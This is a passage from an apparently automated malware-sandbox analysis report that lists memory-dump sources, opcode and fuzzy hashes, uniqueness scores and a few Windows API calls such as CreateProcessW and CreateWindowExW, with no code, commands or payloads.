                                                • API String ID:
                                                • Opcode ID: 379c54d3735d1d7c226cad94860a71502c60f471921d89994ada1e9621283143
                                                • Instruction ID: 2ce80a7b4b1410a56cd0bf2eb1b985ffe468059311da3eb1f6da1904c6e803c2
                                                • Opcode Fuzzy Hash: 379c54d3735d1d7c226cad94860a71502c60f471921d89994ada1e9621283143
                                                • Instruction Fuzzy Hash: 6DF06239B007048BCB167AB894045AEB779EFC6714F05466DDD5957240EF30B945CAD2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.800675071.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0bf01552a5767922dbeb2513b7e2427ec151ff131747036239fea53a0ffdb3c1
                                                • Instruction ID: 5e01b962a3ccec6d94b92055fc4a0dfd6c46a07782eb9a120fd70074077a70b6
                                                • Opcode Fuzzy Hash: 0bf01552a5767922dbeb2513b7e2427ec151ff131747036239fea53a0ffdb3c1
                                                • Instruction Fuzzy Hash: 60F05E313006148FC724AB1AD89492EB7BAFFC8765B55056DE60A87360CF75BC46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.800675071.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4e5cccfe8a7c6904f5fa6e9c8dbcd166fbba1850ea65442eb122f874a000c8d
                                                • Instruction ID: c3f81b372fe912fa8cf15b57a22ef11725194ebfe379420976928cea15b7ad30
                                                • Opcode Fuzzy Hash: d4e5cccfe8a7c6904f5fa6e9c8dbcd166fbba1850ea65442eb122f874a000c8d
                                                • Instruction Fuzzy Hash: 86F01735240A90CFD718CB28D1A8D597BB2FF4A71931648D9E54ACB3B2DB32EC45CB00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.800675071.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e9215be302bcb0d6d2deb7ccfd0f2e5a2d6133599ed2de6b4a61b45d63381bf
                                                • Instruction ID: 721103cc360e1a0f204a6e5aa164e6c2d4d50c7800406860cb14b66bfee40674
                                                • Opcode Fuzzy Hash: 2e9215be302bcb0d6d2deb7ccfd0f2e5a2d6133599ed2de6b4a61b45d63381bf
                                                • Instruction Fuzzy Hash: 92E092322087269FD7519B1DD48086AF3E6EFC92643124E6ED2458B132CF20AD0B9781
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.800675071.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18baf735c14d6235c0962636d1ba376acc5af5c2d320aac545568f167be1033c
                                                • Instruction ID: d1a518eeb17018c462892f56815e29e1f33426041522d1dc361225816ada4186
                                                • Opcode Fuzzy Hash: 18baf735c14d6235c0962636d1ba376acc5af5c2d320aac545568f167be1033c
                                                • Instruction Fuzzy Hash: 87F0DF31240620CFC718DB28D598D5977E5FF4AB1931649A9E10ACB372CBB2EC44CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.800675071.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f08f07736bf37d446223e96b5288969523125c5b86a99bb13bcc70be9f667034
                                                • Instruction ID: 176425bd401fc381ab7e65f90e1e41a4eb3f2c448a515e8d5b2d17e10f3f4d41
                                                • Opcode Fuzzy Hash: f08f07736bf37d446223e96b5288969523125c5b86a99bb13bcc70be9f667034
                                                • Instruction Fuzzy Hash: 57F0A974604308DFC700EFB0E8819AD7BB1EF0A25471181A8D808DB392EB3C1F1ADB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.800675071.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76c03e0c398e13aa1bffd095fcb5849d9ec58df4fbe7a295253eee4a5bb68d39
                                                • Instruction ID: 4db344111e41ac6e58dab082f8fc4607a55af1dfc7150794a33cdc2cb990b79f
                                                • Opcode Fuzzy Hash: 76c03e0c398e13aa1bffd095fcb5849d9ec58df4fbe7a295253eee4a5bb68d39
                                                • Instruction Fuzzy Hash: 37E01A76B04204AF9729DBAAD84049EBBF6AB88220B1580EBD84CD7255FA316A418744
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.800675071.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f31d1037d01a6c7ac64c8f835368d462d7daeee3cd410700661a8d037dd49f01
                                                • Instruction ID: 41246e2880ae1e5eb1982853fc87905f20e0704659c9e96b416e765c0bf48bf3
                                                • Opcode Fuzzy Hash: f31d1037d01a6c7ac64c8f835368d462d7daeee3cd410700661a8d037dd49f01
                                                • Instruction Fuzzy Hash: C1E04F75E5025EEBCB109FD1E904BFDBBB0FB44326F204852D106B1950D7751985CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.800675071.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ce15935c0039b3f3893cbde95ba5722e19d216e7a65c93ea8fdd280360367e9b
                                                • Instruction ID: 67037245ebbf02fa8eb631d4f81aff8f86e788fab2f8c1e453e427224d63cde4
                                                • Opcode Fuzzy Hash: ce15935c0039b3f3893cbde95ba5722e19d216e7a65c93ea8fdd280360367e9b
                                                • Instruction Fuzzy Hash: 78F0AE36A00209CBCB15EFA4E1545DCBBB1EF8D315F2004A9D405B7284CB36AE40CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.800675071.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8315682b2e25ca552c69f833a0958cae53028ea37b7d318270beb30893525f12
                                                • Instruction ID: 586ecaa324e1460387c16cc35312b2b0d820f98165879000f66c9362ddb86eef
                                                • Opcode Fuzzy Hash: 8315682b2e25ca552c69f833a0958cae53028ea37b7d318270beb30893525f12
                                                • Instruction Fuzzy Hash: CFE04F74A0030DEF8700FFB4E54196D77B9EB4A2457208158D904D7344EB391E059B51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.800675071.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e9c603a3f7dd7cc8da8cd9e13199f89792a96025c2f3bcbf67ac7e26dbb42de
                                                • Instruction ID: 953d8e8846de9e357cef41bae779e4b442f6cc8d22e1201676dd98d9caaa986d
                                                • Opcode Fuzzy Hash: 4e9c603a3f7dd7cc8da8cd9e13199f89792a96025c2f3bcbf67ac7e26dbb42de
                                                • Instruction Fuzzy Hash: 03E0927511020ADFCB15DF90D948CA97BBAFB49705716C0AAE5054F232C732E965EF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.800675071.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57d7c7db6a5c63f963760575d619b2ede0d6fb117999d55b184c95690cdb15f0
                                                • Instruction ID: 74215891e766671b66438e03ae35c29f95d964a8d604e7ece03ea41edb294777
                                                • Opcode Fuzzy Hash: 57d7c7db6a5c63f963760575d619b2ede0d6fb117999d55b184c95690cdb15f0
                                                • Instruction Fuzzy Hash: 65E05B30119349CFD7266BD9DC14B7677B8FF0121CB0D4069E9C696453EB25B801E261
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.800675071.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 857e28fab54023d91878f4cc0b9dd451822680cf665cb034368bae6a22e3dc3b
                                                • Instruction ID: 5bd355a82cd94ae85081aa04b9ac41932a0ca17718261104ed9b14b46588ba33
                                                • Opcode Fuzzy Hash: 857e28fab54023d91878f4cc0b9dd451822680cf665cb034368bae6a22e3dc3b
                                                • Instruction Fuzzy Hash: 7BD0123075120BC7DB196BE5AC54F7533ACEF40619B0C5068F41FC1901EB12FC42B561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.800675071.0000000004DD0000.00000040.00000001.sdmp, Offset: 04DD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3eabc85b20e7bceda2f79cf2ba309ba08df0f5ed7bd3e41a2d96108d4be3ac0d
                                                • Instruction ID: 17229678d804506806df1832b4eca6fed7f2013b99ca2fc34c31f4d7d5113c79
                                                • Opcode Fuzzy Hash: 3eabc85b20e7bceda2f79cf2ba309ba08df0f5ed7bd3e41a2d96108d4be3ac0d
                                                • Instruction Fuzzy Hash: BBB09B2231413413D904319D641169E718D8BC5568F410467954D877414DC55C4112E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Executed Functions

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5faed542de2c8c0cbe49672e3c257f0f8e099a760caf0c5e6dbd5a505b269402
                                                • Instruction ID: 74d897a9e3cf91d37f1db5663f157f19a24b67a824fa2b158966f56fd4fe616a
                                                • Opcode Fuzzy Hash: 5faed542de2c8c0cbe49672e3c257f0f8e099a760caf0c5e6dbd5a505b269402
                                                • Instruction Fuzzy Hash: A6528131B001159FDB94EF68D498AADB7F2FF88714B168169E806DB3A1DB35EC11CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c567af5e991d883d74ed96c58678c69af874fb74e7be73addcf88e7ae7baf82
                                                • Instruction ID: 1c05add208d3728005631b238fd08ed7024241f3a2a2cdda66cb24973bdc5638
                                                • Opcode Fuzzy Hash: 4c567af5e991d883d74ed96c58678c69af874fb74e7be73addcf88e7ae7baf82
                                                • Instruction Fuzzy Hash: C352FB74A012288FCB64DF64D898B9DB7B6FF89304F1141E9D50AA7395CB34AE81CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b94c997fa6d0c3e96a1abdcf9e604174c2f1ca76a4dc3b21f62105fe97f97589
                                                • Instruction ID: 09b5ee33c3e8ff542c2b458da3cbe99eaf6ba275d5aa478d17dc2ad127a74797
                                                • Opcode Fuzzy Hash: b94c997fa6d0c3e96a1abdcf9e604174c2f1ca76a4dc3b21f62105fe97f97589
                                                • Instruction Fuzzy Hash: B5D15870D0430ADFDB44DFA6C5898AEFBB2FF89300B54855AD425AB295D734EA42CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3ec051b3cc5ae1650c55f002e333765267bbea661fb283e2cf7d5e7c8f745ea
                                                • Instruction ID: 7e4eddb01ee4839146709f7d9792b8ec384eec66cd2ab2b9fae6bd205aebaafd
                                                • Opcode Fuzzy Hash: f3ec051b3cc5ae1650c55f002e333765267bbea661fb283e2cf7d5e7c8f745ea
                                                • Instruction Fuzzy Hash: A3D14770D0430ADFDB44EFA6C5898AEFBB2FF89300B549559D425AB294D734EA42CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4e8b5cce515678a62fab283633a03e8a621ed854127f9f577f1655c14c49cdc
                                                • Instruction ID: 4c84fa22bb44833f1547db11e04e3ce13d4968f43168beb94f543841f4d47ef5
                                                • Opcode Fuzzy Hash: a4e8b5cce515678a62fab283633a03e8a621ed854127f9f577f1655c14c49cdc
                                                • Instruction Fuzzy Hash: DDB15E74E1121A9FDB44DFA4D880A9EFBB2FF88300F11866AD544AB355D7349D46CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f248d38dc1ce665f1e4645b221cd142a56f6264e8ec9bda362804f825c2ba7b2
                                                • Instruction ID: e64385338f330bd54f632f9b155b59d65d064e80f52e09adda8a1a963f5d3104
                                                • Opcode Fuzzy Hash: f248d38dc1ce665f1e4645b221cd142a56f6264e8ec9bda362804f825c2ba7b2
                                                • Instruction Fuzzy Hash: 11B15D74E1121A9FDB44DFA4D880A9EF7B2FF88300F11866AD558AB355D730A946CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d0a14c563e4ac74435ff667e9a86b22ffeb59fb2f1c01eb0a8097628e24f2e14
                                                • Instruction ID: f082d339e2ea875fc6b003ee3ad15b0c7f755bb6fec6c30797f39968b14eb1df
                                                • Opcode Fuzzy Hash: d0a14c563e4ac74435ff667e9a86b22ffeb59fb2f1c01eb0a8097628e24f2e14
                                                • Instruction Fuzzy Hash: 17A12A75E00219DFDB44DFA9D858AAEBBF2FF88710F158129E415AB364DB349841CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5dfa57adbe04988929c3f6917d2d27bb0f8e260eb95ca50f7170ea275ec9fcae
                                                • Instruction ID: c20b175f0c806683e6e944ab27301b34c002065c1b2da6a168c97dae8e4063d2
                                                • Opcode Fuzzy Hash: 5dfa57adbe04988929c3f6917d2d27bb0f8e260eb95ca50f7170ea275ec9fcae
                                                • Instruction Fuzzy Hash: EDA1F374E04209CFDB48DFA9C984A9EFBB2FF89310F24842AD455AB364D7349942CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 094c55d08685dbc3788644f410889195080981c4771cdf0e18048d68d206c590
                                                • Instruction ID: 83be611e4c4ea36b241937e65a5f993622e0f0813bba6c774c698e45666e8861
                                                • Opcode Fuzzy Hash: 094c55d08685dbc3788644f410889195080981c4771cdf0e18048d68d206c590
                                                • Instruction Fuzzy Hash: 6391D374E042199FDB48DFAAC984A9EFBB2EF89300F14942AD419BB354D7349942CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 75bb68671f9b587b4174e1fc229074800f8a65830ce88d0f63f13082c0da6c39
                                                • Instruction ID: 4d119525002a60cdc64744607581d8c55c841c81bf25d7426d91373ffdb24748
                                                • Opcode Fuzzy Hash: 75bb68671f9b587b4174e1fc229074800f8a65830ce88d0f63f13082c0da6c39
                                                • Instruction Fuzzy Hash: DD51B231B042178FCB94EFA8C888A6EBBF6AF85255F068475E515DB351EB30EC41C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0d6e399343d55a5f5f53f56b82e564603fc79778288aaffa993a641dee1c1c1e
                                                • Instruction ID: 1650fe8456771cdee298bbaf4c2515adba408334da4f0e45f6a91a32471e8209
                                                • Opcode Fuzzy Hash: 0d6e399343d55a5f5f53f56b82e564603fc79778288aaffa993a641dee1c1c1e
                                                • Instruction Fuzzy Hash: 9371B274E00218DFDB14EFAAD984A9DBBF2FF88304F15812AE919AB365DB305941CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: efe2417f3277a74f5ffb93f332b56a6764c6dd9af94cae79839145433bcbf71c
                                                • Instruction ID: e1516840992851cbb2a06a5dac12a7099fd2ca17dba40182bc0c2dfae933f47f
                                                • Opcode Fuzzy Hash: efe2417f3277a74f5ffb93f332b56a6764c6dd9af94cae79839145433bcbf71c
                                                • Instruction Fuzzy Hash: 9F517B70E0420ADFDB48DFA6D885AAEFBF2EF88300F14C06AD455A7255D7749A41CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3711872b0707d6da0fdb415388a8dbc565120ff0411ad1114fdce1e08ee65a12
                                                • Instruction ID: 1190136b25218d588517265ca43ac63feb0e0bcf55e458af75f973855930572b
                                                • Opcode Fuzzy Hash: 3711872b0707d6da0fdb415388a8dbc565120ff0411ad1114fdce1e08ee65a12
                                                • Instruction Fuzzy Hash: 61515870E0420A8FDB48DFAAD8859AEFBF2FF88300F18C06AD415A7255D7749A41CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 50b4138424e9dc45b19ee1ed5b528bf63861db6fa2450343d082399035a108df
                                                • Instruction ID: 285582be0210a59d1dfc4a35616632070c1c4a46baa73267cbb3fb424f9546be
                                                • Opcode Fuzzy Hash: 50b4138424e9dc45b19ee1ed5b528bf63861db6fa2450343d082399035a108df
                                                • Instruction Fuzzy Hash: 8351C375E002189FDB48DFAAD855AAEBBF2EF88700F15C02AE519AB354EB345901CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6dd634a48205b0d34e80427c288ba12eb019b4a2bce7bb21bc14b657440d5b23
                                                • Instruction ID: 14cea09280fb7ef70c85023c70ffa886934a2b30e815da344e84697ed32b4828
                                                • Opcode Fuzzy Hash: 6dd634a48205b0d34e80427c288ba12eb019b4a2bce7bb21bc14b657440d5b23
                                                • Instruction Fuzzy Hash: 9B51E374E052199FCB04DFAAC984AAEFBF2FF88310F14C165E458AB355D734A941CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 32c54f0f56757bb6314f7cbe0a851d169eda86736460fc03c1b484d697243e62
                                                • Instruction ID: 6e62c43f5529935e18863edd905427ab072b65eff7ecb123b63dbd69b3c681a7
                                                • Opcode Fuzzy Hash: 32c54f0f56757bb6314f7cbe0a851d169eda86736460fc03c1b484d697243e62
                                                • Instruction Fuzzy Hash: 705147B0E0420A8FDB48DFAAD5855AEFBF2EF88300F14C02AD515B7254D7749A41CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1967be176ba86bd13322e3dcaa6077dfe022ddc5c782a0827420b828e872ed54
                                                • Instruction ID: ee2515c5407b4191004dc212016c5362dad4be6d73ff598c677b470c52b9cb0c
                                                • Opcode Fuzzy Hash: 1967be176ba86bd13322e3dcaa6077dfe022ddc5c782a0827420b828e872ed54
                                                • Instruction Fuzzy Hash: 7B3103B1E00618CBEB58CFAAD9446DEBBB7BFC9310F14C06AD409A6264DB355A45CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f4b8de8b950e52c84fe54ccdf111a0a5a1f3a948377de427de9543247d19b2c
                                                • Instruction ID: ff05785f5076e5ec3c36470df650e8f1db3874e8f6e178531b5cabca84e2c8a8
                                                • Opcode Fuzzy Hash: 9f4b8de8b950e52c84fe54ccdf111a0a5a1f3a948377de427de9543247d19b2c
                                                • Instruction Fuzzy Hash: C63129B1E046989FDB19CFAAC8443DEBFF2AFCA300F18C0AAD444AA255DB351945CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: Xcl$Xcl$Xcl$Xcl
                                                • API String ID: 0-3281513060
                                                • Opcode ID: dc910d41906393796509590d04364f50ea7e9b79b68395443a02aad925800d4a
                                                • Instruction ID: 5293bda377bfea9245a29d2117d1394aba520805c0229349db89db1210f1e27b
                                                • Opcode Fuzzy Hash: dc910d41906393796509590d04364f50ea7e9b79b68395443a02aad925800d4a
                                                • Instruction Fuzzy Hash: 18515A35A10119DFCB44EF64E459AEDBBF2AF88711F158169E802AB3A0CB71DC41CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.825126549.0000000006D80000.00000040.00000001.sdmp, Offset: 06D80000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: +x2e$+x2e
                                                • API String ID: 0-937816530
                                                • Opcode ID: 3c209ed50916f49e47b5b0f292c78caed2472cff83bfa461fed54638efe3d6a0
                                                • Instruction ID: 1b0af8608d2bdb4932d965ed9313c35aeaca5b6b0740313bfa4bc8e3486b89f7
                                                • Opcode Fuzzy Hash: 3c209ed50916f49e47b5b0f292c78caed2472cff83bfa461fed54638efe3d6a0
                                                • Instruction Fuzzy Hash: 01E06D70D052689FDBE4EB61C841B88BAB2BB05320F088296D02DA7350D7308D84CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0100966E
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.814604796.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: b93327d2173842faa52deb240c1523c713b38b8c8d2564aa11db6b4cf5ecca69
                                                • Instruction ID: c691417656932a10bef91c0af5aaa279fc43ae54ebfdfee96ff879f44314b8f3
                                                • Opcode Fuzzy Hash: b93327d2173842faa52deb240c1523c713b38b8c8d2564aa11db6b4cf5ecca69
                                                • Instruction Fuzzy Hash: 467146B0A00B058FE765DF2AD44575ABBF1FF88308F008A2DD59AD7A91DB35E805CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 02B871D3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: fee4bc6316da8baf9793d0d54d7fffd75622f0752f57d0f35756b5d5c394b1e9
                                                • Instruction ID: bd3333bbf0b84928999f206bc66f9881d266720c471a6f96441b2803013acf44
                                                • Opcode Fuzzy Hash: fee4bc6316da8baf9793d0d54d7fffd75622f0752f57d0f35756b5d5c394b1e9
                                                • Instruction Fuzzy Hash: 645117B1900229DFEF10DF95C880BDDBBB2AF49314F1580AAE908B7250CB755A89CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 02B871D3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.815091111.0000000002B80000.00000040.00000001.sdmp, Offset: 02B80000, based on PE: false
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: e3d2390891aa6ae2fab15b3a5d7e01220e77a1c47e870855907ab997aed2fec6
                                                • Instruction ID: e5c9ca08f090d9fccf8601a09585a4e5900ba1fb763352ff3f7698db2f22fb09
                                                • Opcode Fuzzy Hash: e3d2390891aa6ae2fab15b3a5d7e01220e77a1c47e870855907ab997aed2fec6
                                                • Instruction Fuzzy Hash: 6051F575900329DFEF50DF95C880BDDBBB6AF49314F1580AAE908A7210DB759A88CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0100FECA
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.814604796.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: c91883247bf5a8e950fb4178ff1a4bba0693b9b8be8941261f26918de271fa25
                                                • Instruction ID: 88998c93e65bac037583cd65d7b4ed2832925b4fec718271a9c1aeb67c1a5207
                                                • Opcode Fuzzy Hash: c91883247bf5a8e950fb4178ff1a4bba0693b9b8be8941261f26918de271fa25
                                                • Instruction Fuzzy Hash: BB51D0B1D00349DFEB15CF9AD884ADEBBF5BF48314F64812AE819AB250D7749845CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0100FECA
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.814604796.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 9c4cfaeb0ecb5ab1de6daf2a65f872968122da54ffb4004c73f86eb22544a8d8
                                                • Instruction ID: 4bb4f8997419dc8429eaf96d4606e6e7cbc3199aae79ddaa9cd700dd182d49da
                                                • Opcode Fuzzy Hash: 9c4cfaeb0ecb5ab1de6daf2a65f872968122da54ffb4004c73f86eb22544a8d8
                                                • Instruction Fuzzy Hash: BE51E0B1C003499FEB15CFA9D984ADEBFF1BF48314F24812AE419AB251D7749845CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 01005421
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.814604796.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 2bdb954edb5e531e15680cd63f043d71794feee9695813facef77ead351e1b7f
